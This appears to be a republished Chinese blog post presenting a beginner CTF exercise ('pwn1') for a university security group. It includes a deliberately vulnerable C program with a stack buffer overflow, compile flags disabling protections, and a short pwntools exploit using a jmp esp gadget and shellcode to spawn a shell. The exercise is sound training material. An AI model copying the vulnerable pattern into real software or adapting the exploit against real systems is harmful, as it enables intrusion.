重邮二进制日天群-pwn1

Posted 2020-08-12 君莫笑hhhhhh

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了重邮二进制日天群-pwn1相关的知识，希望对你有一定的参考价值。

给学弟们练手的题目,做的过程中接触一些基本概念

#include <stdio.h>
#include <unistd.h>
int main()
{

    char name[40];   

    welcome();
    
    printf("enter your name\n");
    read(STDIN_FILENO, name, 40);
    name[39] = ‘\x00‘;

    get_contents();
}

void welcome()
{
    printf("welcome to play the game!\n");
}

void get_contents()
{
    char contents[50];
    puts("enter the contents you want to save:");
    read(STDIN_FILENO, contents, 200);
}

编译参数

 -fno-stack-protector -z execstack -m32

题目是最简单的情况,不多加分析,下面直接给出exp

from pwn import *
context(os=‘linux‘, arch=‘x86‘)
#context.log_level=‘debug‘

# 0x80485e3 : jmp esp
# offset: 66
jmp_esp = 0x80485e3


p = process(‘./a.out‘)
#gdb.attach(p)

p.sendlineafter(‘name\n‘, ‘a‘)
p.sendlineafter(‘save:\n‘, ‘a‘*62 + p32(jmp_esp) + asm(shellcraft.sh()))

p.interactive()

以上是关于重邮二进制日天群-pwn1的主要内容，如果未能解决你的问题，请参考以下文章

Pwn_9 作业讲解

逆向及Bof基础实践

20155201 李卓雯《网络对抗技术》实验一逆向及Bof基础

对重邮的一些认识一个通信研二学生的帖子

我给高分,求重邮试题

20155307刘浩《网络对抗》逆向及Bof基础